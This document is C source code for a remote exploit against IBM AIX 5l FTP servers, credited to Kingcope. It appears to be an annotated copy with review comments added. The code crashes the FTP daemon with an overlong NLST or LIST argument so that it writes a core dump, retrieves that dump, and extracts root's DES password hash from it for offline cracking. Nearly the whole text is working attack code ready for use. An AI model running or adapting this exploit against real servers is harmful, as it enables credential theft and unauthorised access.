  1. /*
  2. * IBM AIX 5l FTPd Remote DES Hash Exploit -- Advanced 'Datacenter' Edition :>
  3. *
  4. * Should work on IBM AIX 5.1,5.2,5.3! probably on 4.X too
  5. *
  6. * bug found & exploited by Kingcope
  7. *
  8. * Version 2.0 - July 2010
  9. * ----------------------------------------------------------------------------
  10. * Description: -
  11. * The AIX 5l FTP-Server crashes when an overly long NLST command is supplied -
  12. * For example: NLST ~AAAAA...A (2000 A's should be enough) -
  13. * The fun part here is that it creates a coredump file in the current -
  14. * directory if it is set writable by the logged in user. -
  15. * The goal of the exploit is to get the DES encrypted user hashes -
  16. * off the server. These can be later cracked with JtR. -
  17. * This is accomplished by populating the memory with logins of the user -
  18. * we would like the encrypted hash from. Logging in three times with the -
  19. * target username should be enough so that the DES hash is included in the -
  20. * 'core' file. -
  21. * The FTPd banner looks like below. -
  22. * 220 AIX5l FTP-Server (Version 4.1 Tue May 29 11:57:21 CDT 2001) ready. -
  23. * 220 AIX5l FTP server (Version 4.1 Wed Mar 2 15:52:50 CST 2005) ready. -
  24. * ----------------------------------------------------------------------------
  25. */
  26.  
  27. #include <stdio.h>
  28. #include <stdlib.h>
  29. #include <string.h>
  30. #include <unistd.h>
  31. #include <sys/types.h>
  32. #include <sys/socket.h>
  33. #include <netdb.h>
  34. #include <fcntl.h>
  35.  
/* Forward declarations for the helpers defined after main(). */
int createconnection(char *target, char *targetport); /* resolve + connect; exits on failure */
/* NOTE(review): `getline` collides with POSIX getline(3), which <stdio.h>
 * declares when the libc exposes it (e.g. glibc with its default feature
 * macros); that yields a conflicting-types error at compile time. A
 * project-specific name would avoid it. */
void getline(int s);
void putline(int s, char *out);
void usage(char *exe);

/* Shared I/O buffers. `in` receives both control-channel replies and the
 * data-channel bytes written to the local file; `out` holds the next
 * command line. Both are 8096 bytes. */
char in[8096];
char out[8096];
  43.  
/*
 * Entry point. Parses options, drives two FTP control sessions against the
 * host given with -h, writes whatever the server sends for "core" to a
 * local file named "core", then runs a fixed `strings core | grep ...`
 * pipeline through system().
 *
 * Options (see usage()): -h host and -i local IP are mandatory; -l/-k are
 * only accepted as a pair; -p port, -d directory used in CWD, -c account
 * name used in the first three USER lines, -s send LIST instead of NLST.
 *
 * As seen from the server, session one is: three USER/PASS pairs for the
 * -c account with the constant password "abcdef", a login with -l/-k, CWD,
 * then NLST or LIST whose argument is '~' followed by 1999 'A' bytes.
 * Session two is: login, CWD, TYPE I, PORT, RETR core. A server-side log
 * would presumably record the three initial attempts as failed logins.
 *
 * Returns 0 on completion or -1 if the data socket cannot be created; every
 * other failure path calls exit(1) directly.
 */
int main(int argc, char *argv[])
{
    extern int optind;      /* already declared by <unistd.h>; redundant but harmless */
    extern char *optarg;
    int haveuser=0,havepassword=0;
    int s,s2,nsock;         /* control socket, listening data socket, accepted data socket */
    int c,k,len;            /* NOTE(review): accept() takes socklen_t *, but len is an int */
    int fd;                 /* local "core" output file */

    char *target = NULL;
    char *username = "ftp";     /* default credentials when -l/-k are absent */
    char *password = "guest";
    char *writeto = "pub";      /* directory passed to CWD */
    char *crackme = "root";     /* account name used in the three initial USER lines */
    char *targetport = "21";
    int uselist = 0;            /* -s: send LIST instead of NLST */
    char *myip = NULL;          /* -i: dotted quad placed into the PORT command */
    char *as = NULL;            /* buffer of 'A' bytes for the NLST/LIST argument */
    int octet_in[4], port;
    struct sockaddr_in yo, cli; /* local listening address, accepted peer address */
    char *oct = NULL;

    /* Each option value is copied into a heap buffer that is never freed;
     * the buffers live for the whole process. */
    while ((c = getopt(argc, argv, "h:i:p:l:k:d:c:s")) != EOF) {
        switch(c) {
        case 'h':
            target = (char*)malloc(strlen(optarg)+1);
            strcpy(target, optarg);
            break;
        case 'i':
            myip = (char*)malloc(strlen(optarg)+1);
            strcpy(myip, optarg);
            break;
        case 'p':
            targetport = (char*)malloc(strlen(optarg)+1);
            strcpy(targetport, optarg);
            break;
        case 'l':
            username = (char*)malloc(strlen(optarg)+1);
            strcpy(username, optarg);
            haveuser = 1;
            break;
        case 'k':
            password = (char*)malloc(strlen(optarg)+1);
            strcpy(password, optarg);
            havepassword = 1;
            break;
        case 'd':
            writeto = (char*)malloc(strlen(optarg)+1);
            strcpy(writeto, optarg);
            break;
        case 'c':
            crackme = (char*)malloc(strlen(optarg)+1);
            strcpy(crackme, optarg);
            break;
        case 's':
            uselist = 1;
            break;
        default:
            usage(argv[0]);     /* usage() does not return */
        }
    }

    if (target == NULL || myip == NULL)
        usage(argv[0]);

    /* -l and -k must be given together or not at all. */
    if ((haveuser && !havepassword) || (!haveuser && havepassword)) {
        usage(argv[0]);
    }

    s = createconnection(target, targetport);
    getline(s);                 /* server banner */

    fprintf(stderr, "populating DES hash in memory...\n");

    /* Three USER/PASS pairs for the -c account, always with "abcdef". */
    for (k=0;k<3;k++) {
        snprintf(out, sizeof out, "USER %s\r\n", crackme);
        putline(s, out);
        getline(s);
        snprintf(out, sizeof out, "PASS abcdef\r\n");
        putline(s,out);
        getline(s);
    }

    fprintf(stderr, "logging in...\n");

    snprintf(out, sizeof out, "USER %s\r\n", username);
    putline(s, out);
    getline(s);
    snprintf(out, sizeof out, "PASS %s\r\n", password);
    putline(s,out);
    getline(s);
    getline(s);     /* second read after PASS; presumably the login reply spans two recv()s — confirm */

    fprintf(stderr, "changing directory...\n");

    snprintf(out, sizeof out, "CWD %s\r\n", writeto);
    putline(s, out);
    getline(s);

    fprintf(stderr, "triggering segmentation violation...\n");

    /* 1999 'A' bytes followed by a NUL terminator. */
    as = (char*)malloc(2000);
    memset(as, 'A', 2000);
    as[2000-1]=0;

    if (!uselist) {
        snprintf(out, sizeof out, "NLST ~%s\r\n", as);
    } else {
        /* AIX 5.3 trigger - thanks to karol */
        snprintf(out, sizeof out, "LIST ~%s\r\n", as);
    }
    putline(s, out);

    /* A recv() result below 1 is taken to mean the server side went away;
     * anything else is reported but does not stop the run. */
    memset(in, '\0', sizeof in);
    if (recv(s, in, sizeof in, 0) < 1) {
        printf("trigger succeeded!\nwaiting for core file to be created...\n");
    } else {
        printf("trigger seems to have failed, proceeding anyways...\n"
               "\nwaiting for core file to be created...\n");
    }

    sleep(5);

    close(s);

    /* Second control session. */
    s = createconnection(target, targetport);
    getline(s);

    fprintf(stderr, "logging in 2nd time...\n");

    snprintf(out, sizeof out, "USER %s\r\n", username);
    putline(s, out);
    getline(s);
    snprintf(out, sizeof out, "PASS %s\r\n", password);
    putline(s,out);
    getline(s);
    getline(s);

    fprintf(stderr, "changing directory...\n");

    snprintf(out, sizeof out, "CWD %s\r\n", writeto);
    putline(s, out);
    getline(s);

    fprintf(stderr, "getting core file...\n");

    snprintf(out, sizeof out, "TYPE I\r\n");
    putline(s, out);
    getline(s);

    /* The server is asked (PORT) to connect back to a local listener on a
     * port derived from this process's PID. */
    port = getpid() + 1024;
    len = sizeof(cli);

    bzero(&yo, sizeof(yo));     /* bzero() is declared in <strings.h>, which is not included */
    yo.sin_family = AF_INET;
    yo.sin_port=htons(port);
    yo.sin_addr.s_addr = htonl(INADDR_ANY);

    /* Split -i into its four octets; strtok() modifies myip in place.
     * NOTE(review): with fewer than four dot-separated fields strtok()
     * returns NULL and atoi(NULL) is undefined behaviour. */
    oct=(char *)strtok(myip,".");
    octet_in[0]=atoi(oct);
    oct=(char *)strtok(NULL,".");
    octet_in[1]=atoi(oct);
    oct=(char *)strtok(NULL,".");
    octet_in[2]=atoi(oct);
    oct=(char *)strtok(NULL,".");
    octet_in[3]=atoi(oct);

    snprintf(out, sizeof out, "PORT %d,%d,%d,%d,%d,%d\r\n", octet_in[0], octet_in[1], octet_in[2], octet_in[3], port / 256, port % 256);
    putline(s, out);
    getline(s);

    if ((s2=socket(AF_INET, SOCK_STREAM, 0)) < 0) {
        perror("socket");
        return -1;      /* the only failure path that returns instead of exit(1) */
    }

    if ((bind(s2, (struct sockaddr *) &yo, sizeof(yo))) < 0) {
        perror("bind");
        close(s2);
        exit(1);
    }

    if (listen(s2, 10) < 0) {
        perror("listen");
        close(s2);
        exit(1);
    }

    snprintf(out, sizeof out, "RETR core\r\n");
    putline(s, out);
    getline(s);
    /* getline() left the reply in the global `in`; without "150" in it the
     * transfer is treated as unavailable. */
    if (strstr(in, "150") == NULL) {
        fprintf(stderr, "core file not found... terminating.\n");
        close(s);
        exit(1);
    }

    /* NOTE(review): O_CREAT requires a third (mode) argument; without it
     * the permission bits of the newly created file are unspecified. */
    fd = open("core", O_WRONLY | O_CREAT);
    if (fd == -1) {
        perror("open on local core file");
        close(s);
        exit(1);
    }

    sleep(1);

    if ((nsock = accept(s2, (struct sockaddr *)&cli, &len)) < 0) {
        perror("accept");
        close(s);
        exit(1);
    }

    /* Copy the data connection into the local file until the peer closes.
     * NOTE(review): write()'s return value is ignored, so a short write
     * silently loses data. */
    do {
        k = recv(nsock, in, sizeof in, 0);
        if (k < 1) break;
        write(fd, in, k);
    } while (k > 0);

    close(nsock);
    close(fd);
    close(s);       /* s2, the listening socket, is never closed explicitly */

    fprintf(stderr, "finally extracting DES hashes from core file for user '%s'...\n", crackme);
    /* Fixed command string — no user-controlled text reaches the shell;
     * depends on strings(1) and grep(1) being available on PATH. */
    system("strings core | grep '^[A-Za-z0-9]\\{13\\}$'");

    fprintf(stderr, "done.\n");
    return 0;
}
  272.  
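/*
 * Resolve target:targetport and return a connected TCP socket.
 *
 * Only the first address returned by getaddrinfo() is used. Any failure
 * prints a diagnostic to stderr and terminates the process with status 1,
 * so callers never see an error return (unchanged from the original
 * contract). The addrinfo list is released before returning; the caller
 * owns the returned descriptor and is responsible for closing it.
 *
 * target:     host name or numeric address string.
 * targetport: service name or decimal port string.
 * Returns the connected socket descriptor.
 */
int createconnection(char *target, char *targetport) {
    struct addrinfo hints, *res;
    int s;
    int gai;

    memset(&hints, 0, sizeof hints);
    hints.ai_family = AF_UNSPEC;
    hints.ai_socktype = SOCK_STREAM;

    /* getaddrinfo() reports failure through its return value, not errno,
     * so perror() would print an unrelated message; use gai_strerror(). */
    gai = getaddrinfo(target, targetport, &hints, &res);
    if (gai != 0) {
        fprintf(stderr, "getaddrinfo: %s\n", gai_strerror(gai));
        exit(1);
    }

    s = socket(res->ai_family, res->ai_socktype, res->ai_protocol);
    if (s < 0) {
        perror("socket");
        freeaddrinfo(res);
        exit(1);
    }

    if (connect(s, res->ai_addr, res->ai_addrlen) < 0) {
        perror("connect");
        close(s);
        freeaddrinfo(res);
        exit(1);
    }

    /* The original never freed res on the success path, and this function
     * is called more than once per run. */
    freeaddrinfo(res);
    return s;
}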
  299.  
/*
 * Read one chunk of the control connection into the global buffer `in`
 * and echo it to stderr.  This is a single recv() call, not a line reader:
 * a reply may arrive in pieces or several replies may arrive together
 * (the caller compensates by calling getline() twice after PASS).
 * A recv() result of 0 (peer closed) or -1 is fatal: the errno message is
 * printed, the socket is closed and the process exits with status 1.
 *
 * NOTE(review): if recv() fills all of `in` there is no NUL terminator and
 * the "%s" below reads past the buffer — confirm replies stay well below
 * sizeof in.
 * NOTE(review): the name collides with POSIX getline(3) from <stdio.h> on
 * libcs that expose it under default feature macros (e.g. glibc), which
 * fails to compile with a conflicting-types error.
 *
 * s: connected control socket.
 */
void getline(int s)
{
    memset(in, '\0', sizeof in);        /* a short reply is then NUL-terminated */
    if (recv(s, in, sizeof in, 0) < 1) {
        perror("recv");
        close(s);
        exit(1);
    }

    fprintf(stderr, "<\t%s", in);
}
  311.  
/*
 * Echo one outbound control-channel line to stderr and send it on s.
 * On a send() error the errno message is printed, the socket is closed and
 * the process exits with status 1, so the caller never sees a failure.
 *
 * s:   connected control socket.
 * out: NUL-terminated string transmitted verbatim (including its CRLF).
 *      This parameter shadows the file-scope buffer of the same name.
 */
void putline(int s, char *out) {
    size_t n = strlen(out);

    fprintf(stderr, ">\t%s", out);
    if (send(s, out, n, 0) != -1) {
        return;
    }

    perror("send");
    close(s);
    exit(1);
}
  321.  
/*
 * Print the command-line synopsis to stderr and terminate.
 *
 * exe: argv[0], substituted into the synopsis.
 * Never returns. The exit status is 0 even when reached because of bad
 * arguments, so scripts cannot distinguish "help" from "usage error".
 */
void usage(char *exe)
{
    static const char synopsis[] =
        "%s <-h host> <-i your internal ip> [-p port] [-l username] [-k password]"
        " [-d writable directory] [-c user to crack] [-s use 'LIST' command on AIX 5.3]\n";

    fprintf(stderr, synopsis, exe);
    exit(0);
}